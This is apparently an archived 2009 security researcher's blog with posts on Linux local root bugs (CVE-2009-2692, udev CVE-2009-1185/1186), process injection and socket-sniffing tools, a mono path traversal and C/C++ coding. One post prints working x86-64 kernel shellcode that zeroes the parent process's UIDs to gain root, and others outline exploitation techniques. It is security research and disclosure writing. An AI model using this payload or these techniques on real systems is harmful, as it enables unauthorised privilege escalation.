C skills

Thoughts on companion worms

2009-12-23T06:40:00.000-08:00

I wrote a paper almost a year ago now and since it has been
reviewed by a lot of skilled people including, but not limited
to, anti virus researchers, its time to make it public.

Its about a special kind of worm and vulnerabilities
which are commonly under-hyped like CVE-2008-2383 which
most people would probably only recognize as local, if at all.

You can find the paper here.

Enjoy reading it, if you feel that X-mess is coming :)
This is most likely the last posting for this year, so
I wish you merry X-mas and happy new year. You can find me
at the 26C3 in Berlin this year, if everything goes straight.

Always check return value!

2009-11-30T23:47:00.000-08:00

A nice bug inside the FreeBSD runtime linker has been
reported here.

It was good that I hashed my previous exploit
(discovered it some months ago) in my twitter message
from November 5th:

md5 4b1717926ed0d4823622011625fb1824 sha1 6871fd05efbddf7eea4447f7bfdc1c9a45979fe3

Since a public exploit is now available anyway,

I also make my version public and you can check the

hashes

here 

to prove it.

I have a strange feeling that this re-discovery comes now,
since I talked to some people regarding BSD bugs lately.
Nevertheless I know kingcope is a skilled reviewer and
it was not the first time he had BSD as a target.

Adventures in Heap Cloning

2009-11-15T00:58:00.000-08:00

Heap seems to be a magic word. I never got download rates
like this for a paper. Since there was no feedback that
told me that I am completely wrong, I make it
available to a broader public now. A small chapter has been
added: 'Countermeasures'.
The paper is available here.
You probably know that I am not a memory-guy, so do not
expect much more research in this area by me.
I rather really enjoy developing code that hashes
like this:
sha1: c60a0e1daff22c0d97eb03f509c7135d119d830b
md5: fcb19f8317449ad9f93a12fccb63c650.

xorl blog seems to be up again

2009-11-02T02:23:00.000-08:00

A few weeks/months ago I sadly realized that the author
of the xorl blog was quitting his writeups. Now it seems
that he is continuing his activities. Now I have
something nice to read at the beginning of the day.
Although he doesn't speak about vulnerabilities he found
himself, its one of the better security blogs in my opinion.
I really enjoy reading it and like to recommend it to
everyone interested in software trickery.
I want more OpenBSD foo. :)

injectso 32bit x86 port

2009-10-16T07:35:00.000-07:00

injectso now supports x86 and x86-64 architecture. make automagically

compiles the correct version.I also added some code cleanups and

error checking as well as the possibility to inject DSO's with relative

pathnames as suggested by a patch I received.

Do not forget to vote (right toolbar:) !

New injectso available

2009-10-14T08:43:00.000-07:00

I ported injectso to the new glibc (2.5, 2.9 and 2.10 tested).
It now runs on Linux/x86-64 machines. Original developed
by Shaun Clowes in 2001 for i386 and sparc it showed that
there is a really simple way on current systems to do that.

unixdump UNIX-socket sniffer available

2009-09-30T02:44:00.000-07:00

Update:
Released new version (0.42) since 0.41 (not avail anymore)
crashes when accessing udmp device afer rmmod.
(The dynamically assigned major number was not updated
for unregistering.) Thanks to myself for reviewing my own
code :)

Ok, its finally avail here.

Do not run it inside an xterm or otherwise its
like sniffing all tcp traffic remotely on a ssh shell.
BTW ssh. Due to my ssh timing/packet-size patch
I've been called a Iran circumvention developer.

Really funny wording. I like to add that to my
resume.
And right in time while typing
they play LOA with Love to let you down.
What do you want more?

When const really means const

2009-09-29T09:02:00.000-07:00

Who cares about const? Its never enforced anyways!?

Except in Linux kernels built with gcc 4.x (maybe even
before?). If you declare a pointer member const
(the thing it points to, not the pointer itself), like
proto_ops in the socket struct, the pointee will be placed in a
RO location which means you cant redirect socket operation
functions like recvmsg(). You have to make the right PTE
writable in order to redirect the functions.
Rootk^H^H^H^H^HCertain debugging LKMs like my unixdump
require to redirect some functions in order to record
whats sent across sockets. unixdump works like tcpdump
for inet sockets. The version which is available now was
written in 2006 for the 2.6.16 kernel and doesnt work with
recent/current ones (and its dirty and hackish anyways).
Thats why I ported it within the last days to current kernels.
It will be uploaded soon.
The way you can modify const members changed in current kernels;
in fact is is easier than before b/c a new function lookup_address()
is exported and you do not need to walk the PGD down.

GCC -fmudflap

2009-09-22T04:24:00.000-07:00

Programs compiled with -fmudflap are given protection by GCC
against overflow conditions etc. The GCC then adds a runtime
to track&check operations on arrays etc..
To specify runtime behavior, you can pass various
options via the $MUDFLAP_OPTIONS environment variable.
If we look how the mudflap runtime is
handling these options, we have:

...
case viol_gdb:

snprintf (buf, 128, "gdb --pid=%u", (unsigned) getpid ());
system (buf);
...

Note, that mudflap is made for security reasons. For programs
like network servers or setuid binaries.
I made a bugzilla entry into the GCC bugzilla since this
should be changed somehow :)

Small improvement for inotify

2009-09-21T23:25:00.000-07:00

The inotify tool got a small improvement yesterday, so you
can pass -r (recursion) to it. It now also allows you to recursively
watch newly created/modified/deleted/accessed files/dirs
in newly created subdirs of the watched directory.
This already showed me some differences between man versions :)

un-evil code

2009-09-14T01:53:00.000-07:00

I had incredible dl statistics for gc.cc (see last posting). Even
better than for exploits, years ago when I was publishing them.
Seems to me I should switch completely to write robust and boring
application code which is much more appreciated by the public.

Nevertheless, since there have not been reports about
crash containing major bugs or alike, I removed the beta-test
password from the directory.

C++ local_scope<> template

2009-09-04T06:53:00.000-07:00

If you write a lot of code (and I know, some of the readers
actually do :), depending on your style, you often run
into situations where you allocate some ressource like
fopen()ing some files or allocing memory and later
you realize some error-condition and you properly need
to fclose()/free() all the stuff in the right order
and depending on what was allocated yet.
This leads to a lot of copy-n-paste code and often
plain wrong code or even better security breaches :)

If you like C++, you can have a look here to avoid
all these problems.

You can register FILE pointers, file-descriptors or
memory regions to a local_scope<> template and it
automatically closes/releases ressources when you leave scope
(also in right order).It is as easy as

local_scope<int> fd(open("/tmp/x2", O_RDONLY), close);

and you can use fd afterwards like you'd normally use
your descriptor. If you need to return due to some
other error condition, the file is closed when the
scope is left.Other ressources like lock's etc could easily
be added by extending local_scope<>.

rewrote Port Shell Crypter

2009-08-28T05:47:00.000-07:00

I rewrote PSC, a tool to upgrade plaintext and/or
sessions without a tty across networks (even via
multiple hops) to a full crypted pty based session.

It works by doing the handshake and crypto across
the terminal layer instead of using network calls. The whole
code does not need any networking functionality.
If you have a chained session from host A to D like
A -> B -> C -> D and before starting the session you start your
local psc tool on host A and as soon as on host D you start
the other endpoint, the full chain is encrypted and nobody
on B and C can see or modify what you are typing.
Evil administrators on intermediate hosts (B, C) might use
ptrace() or whatever to even sniff SSH sessions. Using psc,
this is not possible anymore.

First, I wanted to make some video (since it seems very hip
these days :) showing how a old gitweb exploit makes a full
pty crypto shell using psc so you could use 'mc' etc.
on it at the end. However, xvidcap has some lib requirements
which I cant give it on my machine yet without hours
of recompilation and so I thought I do the release old-school. :)

CRypted Administration SHell beta available

2009-08-21T05:58:00.000-07:00

You can download crash here.

I started this project during last hackweek in July 09 and
now found some time to finish it.
Login/password is cr4sh/cr4sh. If you have any major problems
please let me know, otherwise the release will be made
available to a broader audience.
crash has not yet been tested on slow/hanging networks
and I'd be interested in feedback whether the chunksizes
still do etc.

CVE-2009-2692 and android; mitigation

2009-08-15T03:16:00.000-07:00

Update:{ it seems like someone else have had more time than me
checking out the CVE-2009-2692 vulnerability and the -EINVAL
vs. -EPERM issue on android. As already stated below, one
should check the ELF loader and how it handles PT_LOAD
segments of 0-addr.And, it seems that it did the trick!
At least from reading their exploit.
I didnt test it but it looks good to me.}

I made up a reliable exploit for CVE-2009-2692 myself with a generic
kernel 2.6 x86-64 shellcode which has only a small stub in
asm and does the rest in C.
It works reliable across the various kernel versions and I hoped to pwn my android with it, but unfortunately it turned out that the running 2.6.27 kernel inside has proper mmap_min_addr set to 0x1000 so this bug is out of the game. There is no suid for a
PERSONALITY_SVR4 preload either. The thing that makes me
wonder is, that it returns -EINVAL instead of the common -EPERM,
so maybe some further research is required.
Maybe linking the ELF binary's PT_LOAD segment to 0 helps :)

The funny thing is that a lot "CVE-2009-2692 exploit" queries
from search engines point to this site and the crowd seem to have problems finding spender's wunderbar_emporium.tgz :-)

If you are looking for easy mitigation of the attack
on openSUSE systems, call

echo 0x1000 > /proc/sys/vm/mmap_min_addr

from a rootshell. Since there is no setuid pulseaudio or
SELinux installed on openSUSE, this kills any NULL ptr attacks.

A .note on CVE-2009-2692

2009-08-14T04:35:00.000-07:00

I recommend reading this posting.

I am usually not commenting on other ppl's bug-findings. 100% of the fame and honor should
go to Tavis Ormandy and Julien Tinnes. If spenders exploit is doing too much magic for you,
heres the simple code snippet, which, if mapped at 0x0 gives you root:

// threadinfo = $0xffffffffffffe000 & %rsp
// task_struct offsets: current->parent = 696 current->uid = 1080
void do_root_2_6_27_x8664()
{
        __asm__(""
        "xor    %rax,%rax\n"
        "mov    $0xffffffffffffe000,%rax\n"     /* find threadinfo */
        "and    %rsp,%rax\n"
        "mov    (%rax),%rax\n"                  /* threadinfo->task     */
        "mov    696(%rax),%rax\n"               /* task->parent         */
        "movl   $0,1080(%rax)\n"                /* task->uid = 0        */
        "movl   $0,1084(%rax)\n"                /* task->euid = 0       */
        "movl   $0,1088(%rax)\n"                /* task->suid = 0       */
        "movl   $0,1092(%rax)\n"                /* task->fsuid = 0      */
        "movl   $0,1096(%rax)\n"                /* task->gid = 0        */
        "movl   $0,1100(%rax)\n"                /* task->egid = 0       */
        "leaveq\n");
}

It doesn't disable SELinux or so, its just for understanding that for simple rootshell you only
need to give the parent of the exploit (which is usually the shell that started the exploit)
UID/EUID of 0. The code is a modification of shellcode I used in a bluetooth kernel
PoC exploit 4 years or so ago.The code will cause a segfault
to the current process which does not matter since we
only care about the parent shell which obtains its root privs.

So, how much magic is there with the exploit?

Greetings to the people at HAR, I am sad I cannot attend this time :(

pwned

2009-07-30T01:59:00.000-07:00

Today I proudly realized, while viewing Referer logs, I
have been nominated for the Best Privilege Escalation
Bug in the pwnie-awards for discovering and exploiting
CVE-2009-1185 (udev). The story behind that is that
I was frustrated to have no root-sex within the last
6 months or so (since postfix) and therefore
I started reviewing the glibc ELF loader for such which lead me
somehow to certain daemons such as nscd followed by
hald and finally udevd. I quickly realized that it missed
important checks but the impact was unknown to me since
it kindly denied my exploitation offers until I found my way in.

You might be surprised to hear that I am not really
a security guy and used to stay away from sec-con events,
even though I work in that field.
I rather see myself as a programmer with interest in coding
and reading other peoples code and its often funny to
watch and follow discussions by the "security professionals".

The thing that makes me actually commenting on this is the
nice coincide with the nomination of my hero Solar Designer. :)

unreadable comments

2009-07-29T02:29:00.000-07:00

Its possible that its just spam, but I receive a lot
of chinese/japanese or whatever comments to my postings.
Since I wont approve what I dont understand, I cannot
approve these. So, please comment either in deutsch
or in english.

A .note on local root exploits

2009-07-19T02:35:00.000-07:00

There happened a lot of weird things and discussions
during the last week. Not only a silly kernel/gcc
combination attack was published by my favorite VJ;
also a second issue was released by the google sec-team,
which unfortunally was inside the same program that spender
used as an attack vector in one of the videos.

At the end, its nice that there are (thanks god, I am not
alone in this world!) people who seem to like/care
about local root exploits. You should definitely
have a look at Julien's blog (pulseuadio as well
as the mmap_min_addr postings).I feel like _uh,ohhh_
that theres actually some people doing real things
beside all the web 2.o, XSS and similar sillyness.

As you might know (or not, who cares :) I like local
root exploits. Every now and then I try to find some,
and sometimes I am even successful. Not only two times
so far, as some blogs try to suggest. :-)
Surprinsingly it is not much harder than 10 years ago,
if we do not count overflow/memory corruption bugs.
The bugs just get more silly and most of the time they
require a combination of multiple minor flaws. But
thats exactly what makes the beauty of local root exploits.

Some people do not honour them. They argue that only
remote exploits are of interest. But these people probably
never run a cluster or one of the top500's or found themself
removing ssh backdoors on a weekend instead of having fun.

A local vulnerability deservs the same update urgency
as remote ones.

NULL ptr derefs are out!

2009-07-15T03:33:00.000-07:00

Today, I was diving through some foreign code, and this made me remember my
own mistakes:
...

        while ((start = strchr (start, '<'))) {
                start += 1;
                if (!start || !*start)
                        break;

...

funny, eh?

Do not follow me on twitter

2009-05-05T07:38:00.000-07:00

I just grabbed a login on twitter but I am probably
not going to publish something there. Its just
a place holder.

I reviewed a lot of messaging code (hal, upstart etc.) during the last few weeks
as a post-handling of the udev issue. I learned a lot and
thats great, but no new interesting issues so far.

New WWW censorship (f)laws in .de

2009-04-18T01:34:00.000-07:00

I am usually not into politics, but today its necessary and I
hope I am not forced too often to write such statements.
Its about the german government introducing censorship
into the WWW while big companies spy on their employees.
Instead of bringing law to the people, flaw is brought to
the people.

Das Ministerium für Gedöhns (O-Ton Ex-Bukasch) hat es geschafft
die deutschen Internetprovider zu Leymen. Brav unterzeichnen sie
in der Majorität Knebelverträge mit dem BKA (Quelle Wikileaks).
Komisch wie schnell soetwas geht, während Datenskandalen
und Misswirtschaft anscheinend nicht beizukommen ist.
Es ist wohl alles nur eine Frage des richtigen Leyms.
Nach bekanntem Muster werden mal wieder eine handvoll Perversitäten
oder Terroristen als Anlass genommen den Bürger noch
ein Stück mehr zu gängeln.

Mich würde rein technisch interessieren wieviel Latenz bereits
jetzt durch genannte Sperren, Filter, Bundestrojaner,
Vorratsdatenspeicherung, Legal-Interception Implementierungen usw.
verloren geht. Wahrscheinlich ruft mich die T deshalb drei
mal die Woche an, ob ich nicht auf VDSL upgraden möchte.

udev trickery (CVE-2009-1185 and CVE-2009-1186)

2009-04-16T01:57:00.000-07:00

While the security industry is making weird statements about
no-more-free-hugs and OSX vs. Windows exploitation fun,
I add my two cents on UNIX exploitation.

There have been two problems in all currently running udevd's
which are shipped on all major Linux distributions. Even if you
install selinux or other hardening mechanisms, you are at risk
(please see above screenshot on a targeted selinux config).

The first problem (CVE-2009-1185) appears since the origin of
KOBJECT_UEVENT messages are not verified, so any user can spoof
messages that udevd takes as granted from kernel. This allows
some trickery to create a device named /dev/random with permission
0666 but major and minor number of your root blockdevice. The rest
is code. Alternatively, CVE-2009-1186 could be exploited
which is a standard stack buffer overflow. Depending on the
configuration of the system CVE-2009-1185 can also be exploited
with weird network interface-names and alike so at the end,
chrooted/jailed or PrivSep'ed users have good chance to get a full rootshell.

sharpen your .NET skills

2009-03-24T08:16:00.000-07:00

I have had dozens of discussions about C#; being a secure
language and that CLR/VM based languages should be used
with new projects in order to increase security. One argument
is that memory corruption can't happen any longer.
I agree, but always point out that C# code is not secure
automagically, even if the programmers code is correct.
The runtime might be buggy as well! I recently read an
article in the famous german iX magazine about security measurements
in .NET. One of the measures is the so called IsolatedStorage
which allows you to store data in a secure way. Much like
a database, based on a token you can store/retrieve data
without your real filesystem being at risk. Nice thing,
and I coded an example-server:

using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.IO;
using System.IO.IsolatedStorage;

class Server {

  private static void store(string key, Byte[] b)
  {
          try {
                  Console.WriteLine("Isolated storage @ {0}", key);
                  IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Create);
                  fs.Write(b, 0, b.Length);
                  fs.Close();   
          } catch {
                  Console.WriteLine("Exception!");
          }
  }

  private static Byte[] load(string key)
  {
          Byte[] b = new Byte[256];
          try {
                  Console.WriteLine("IsolatedStorage load @ {0}", key);
                  IsolatedStorageFileStream fs = new IsolatedStorageFileStream(key, FileMode.Open);
                  fs.Read(b, 0, b.Length);
                  fs.Close();   
          } catch {
                  Console.WriteLine("Exception!");
          }
          return b;
  }
  public static void Main()
  {
          Byte[] buf = new Byte[256];
          int cnt;

          string data = "";

          ASCIIEncoding ascii = new ASCIIEncoding();
          TcpListener l = new TcpListener(8080);
          l.Start();
          try {
                  Socket s = l.AcceptSocket();
                  while (data.Trim() != "quit") {
                          Array.Clear(buf, 0, buf.Length);
                          if ((cnt = s.Receive(buf, buf.Length, 0)) == 0)
                                  break;
                          data = ascii.GetString(buf, 0, cnt);
                          Console.WriteLine("Received: {0}", data.Trim());
                          if (data.StartsWith("store ")) {
                                  Array.Clear(buf, 0, buf.Length);
                                  if (s.Receive(buf, buf.Length, 0) == 0)
                                          break;
                                  store(data.Substring(6, data.Length - 6).Trim(), buf);
                          } else if (data.StartsWith("load ")) {
                                  Byte[] result = load(data.Substring(5, data.Length - 5).Trim());
                                  s.Send(result);
                          }
                  }
          } catch {
                  Console.WriteLine("Exception!");
          }
          l.Stop();
  }
}

You can connect to the server on TCP port 8080 and
store/load data via the telnet interface for example.
Beside the easy of code and the fact that it treats
TCP streams like messages which could make trouble in
real networking environments, this code should be correct.
It fits perfectly as a localhost example. There is just
a problem with the IsolatedStorage itself!
Some versions of the mono runtime do not remove
"../" character sequences from the path component as it
should. So, depending on your configuration you can
obtain funny results. On a openSUSE 11.1, the storage
place is in ~/.config/.isolated-storage/[some-hash]/.

An attacking scenario is inside the xterm.
I already informed the maintainers and a fix is underway.
Its not a big issue, and I dont have any application in mind
that is actually vulnerable and uses IsolatedStorage this way.

File-system/storage tricks will be a major playground for
.NET/C# applications in future. In a non-public review
of a larger C# based "system" it turned out that it was possible to obtain
local root privileges by loading evil assemblies as
a result of tricking the application.

Additionally, the managed runtime may provide
(depending on the implementation) all the
nasty things that we got rid of in native CPUs during
the last years: executable data, fixed addresses etc.

PcapSharp updated

2009-03-20T11:59:00.000-07:00

You can find a new pcap# version of my mono pcap binding
on my website. Its better tested than the old version,
and supports packet dumping and offline capturing of packets
now as well as it supported online capturing in the past.
It is possible to read/analyze the pcap# dump-files with
tcpdump and wireshark. I am not an expert for Marshalling
C# types to plain C types, but I think I got it right :-)